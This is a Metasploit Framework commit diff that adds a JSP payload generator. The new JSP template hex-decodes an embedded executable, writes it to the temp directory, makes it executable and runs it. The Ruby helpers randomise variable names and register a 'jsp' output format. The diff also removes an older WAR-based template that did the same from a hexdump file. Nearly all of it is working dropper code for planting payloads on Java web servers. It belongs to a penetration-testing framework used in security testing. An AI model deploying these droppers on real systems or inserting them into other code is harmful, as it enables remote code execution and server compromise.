dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Land #7283, add jsp payload generator

This commit is contained in:
dmohanty-r7 2016-09-16 14:37:59 -05:00
parent 4d0643f4d1 c6012e7947
commit 4c4f2e45d6
No known key found for this signature in database
GPG Key ID: D1B3982EAB38742F
3 changed files with 79 additions and 97 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

38
data/templates/scripts/to_exe.jsp.template Normal file
View File

@ -0,0 +1,38 @@
<%%@ page import="java.io.*" %%>
<%%
String %{var_payload} = "%{payload}";
String %{var_exepath} = System.getProperty("java.io.tmpdir") + "/%{var_exe}";
if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1) {
%{var_exepath} = %{var_exepath}.concat(".exe");
}
int %{var_payloadlength} = %{var_payload}.length();
byte[] %{var_bytes} = new byte[%{var_payloadlength}/2];
for (int %{var_counter} = 0; %{var_counter} < %{var_payloadlength}; %{var_counter} += 2) {
%{var_bytes}[%{var_counter} / 2] = (byte) ((Character.digit(%{var_payload}.charAt(%{var_counter}), 16) << 4)
+ Character.digit(%{var_payload}.charAt(%{var_counter}+1), 16));
}
FileOutputStream %{var_outputstream} = new FileOutputStream(%{var_exepath});
%{var_outputstream}.write(%{var_bytes});
%{var_outputstream}.flush();
%{var_outputstream}.close();
if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1){
String[] %{var_fperm} = new String[3];
%{var_fperm}[0] = "chmod";
%{var_fperm}[1] = "+x";
%{var_fperm}[2] = %{var_exepath};
Process %{var_proc} = Runtime.getRuntime().exec(%{var_fperm});
if (%{var_proc}.waitFor() == 0) {
%{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
}
File %{var_fdel} = new File(%{var_exepath}); %{var_fdel}.delete();
} else {
String[] %{var_exepatharray} = new String[1];
%{var_exepatharray}[0] = %{var_exepath};
Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepatharray});
}
%%>

51
data/templates/scripts/to_exe_jsp.war.template
View File

@ -1,51 +0,0 @@
<%%@ page import="java.io.*" %%>
<%%
String %{var_hexpath} = application.getRealPath("/") + "/%{var_hexfile}.txt";
String %{var_exepath} = System.getProperty("java.io.tmpdir") + "/%{var_exe}";
String %{var_data} = "";
if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1)
{
%{var_exepath} = %{var_exepath}.concat(".exe");
}
FileInputStream %{var_inputstream} = new FileInputStream(%{var_hexpath});
FileOutputStream %{var_outputstream} = new FileOutputStream(%{var_exepath});
int %{var_numbytes} = %{var_inputstream}.available();
byte %{var_bytearray}[] = new byte[%{var_numbytes}];
%{var_inputstream}.read(%{var_bytearray});
%{var_inputstream}.close();
byte[] %{var_bytes} = new byte[%{var_numbytes}/2];
for (int %{var_counter} = 0; %{var_counter} < %{var_numbytes}; %{var_counter} += 2)
{
char %{var_char1} = (char) %{var_bytearray}[%{var_counter}];
char %{var_char2} = (char) %{var_bytearray}[%{var_counter} + 1];
int %{var_comb} = Character.digit(%{var_char1}, 16) & 0xff;
%{var_comb} <<= 4;
%{var_comb} += Character.digit(%{var_char2}, 16) & 0xff;
%{var_bytes}[%{var_counter}/2] = (byte)%{var_comb};
}
%{var_outputstream}.write(%{var_bytes});
%{var_outputstream}.close();
if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1){
String[] %{var_fperm} = new String[3];
%{var_fperm}[0] = "chmod";
%{var_fperm}[1] = "+x";
%{var_fperm}[2] = %{var_exepath};
Process %{var_proc} = Runtime.getRuntime().exec(%{var_fperm});
if (%{var_proc}.waitFor() == 0) {
%{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
}
File %{var_fdel} = new File(%{var_exepath}); %{var_fdel}.delete();
}
else
{
String[] %{var_exepatharray} = new String[1];
%{var_exepatharray}[0] = %{var_exepath};
Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepatharray});
}
%%>

87
lib/msf/util/exe.rb
View File

@ -1407,6 +1407,40 @@ require 'msf/core/exe/segment_appender'
read_replace_script_template("to_powershell.hta.template", hash_sub)
end
def self.to_jsp(exe)
hash_sub = {}
hash_sub[:var_payload] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_exepath] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_outputstream] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_payloadlength] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_bytes] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_counter] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_exe] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_proc] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_fperm] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_fdel] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_exepatharray] = Rex::Text.rand_text_alpha(rand(8)+8)
payload_hex = exe.unpack('H*')[0]
hash_sub[:payload] = payload_hex
read_replace_script_template("to_exe.jsp.template", hash_sub)
end
# Creates a Web Archive (WAR) file containing a jsp page and hexdump of a
# payload. The jsp page converts the hexdump back to a normal binary file
# and places it in the temp directory. The payload file is then executed.
#
# @see to_war
# @param exe [String] Executable to drop and run.
# @param opts (see to_war)
# @option opts (see to_war)
# @return (see to_war)
def self.to_jsp_war(exe, opts = {})
template = self.to_jsp(exe)
self.to_war(template, opts)
end
def self.to_win32pe_vbs(framework, code, opts = {})
to_exe_vbs(to_win32pe(framework, code, opts), opts)
end
@ -1500,52 +1534,6 @@ require 'msf/core/exe/segment_appender'
zip.pack
end
# Creates a Web Archive (WAR) file containing a jsp page and hexdump of a
# payload. The jsp page converts the hexdump back to a normal binary file
# and places it in the temp directory. The payload file is then executed.
#
# @see to_war
# @param exe [String] Executable to drop and run.
# @param opts (see to_war)
# @option opts (see to_war)
# @return (see to_war)
def self.to_jsp_war(exe, opts = {})
# begin <payload>.jsp
hash_sub = {}
hash_sub[:var_hexpath] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_exepath] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_data] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_inputstream] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_outputstream] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_numbytes] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_bytearray] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_bytes] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_counter] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_char1] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_char2] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_comb] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_exe] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_hexfile] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_proc] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_fperm] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_fdel] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_exepatharray] = Rex::Text.rand_text_alpha(rand(8)+8)
# Specify the payload in hex as an extra file..
payload_hex = exe.unpack('H*')[0]
opts.merge!(
{
:extra_files =>
[
[ "#{hash_sub[:var_hexfile]}.txt", payload_hex ]
]
})
template = read_replace_script_template("to_exe_jsp.war.template", hash_sub)
self.to_war(template, opts)
end
# Creates a .NET DLL which loads data into memory
# at a specified location with read/execute permissions
# - the data will be loaded at: base+0x2065
@ -2221,6 +2209,12 @@ require 'msf/core/exe/segment_appender'
when 'loop-vbs'
exe = exe = to_executable_fmt(framework, arch, plat, code, 'exe-small', exeopts)
Msf::Util::EXE.to_exe_vbs(exe, exeopts.merge({ :persist => true }))
when 'jsp'
arch ||= [ ARCH_X86 ]
tmp_plat = plat.platforms if plat
tmp_plat ||= Msf::Module::PlatformList.transform('win')
exe = Msf::Util::EXE.to_executable(framework, arch, tmp_plat, code, exeopts)
Msf::Util::EXE.to_jsp(exe)
when 'war'
arch ||= [ ARCH_X86 ]
tmp_plat = plat.platforms if plat
@ -2258,6 +2252,7 @@ require 'msf/core/exe/segment_appender'
"exe-small",
"hta-psh",
"jar",
"jsp",
"loop-vbs",
"macho",
"msi",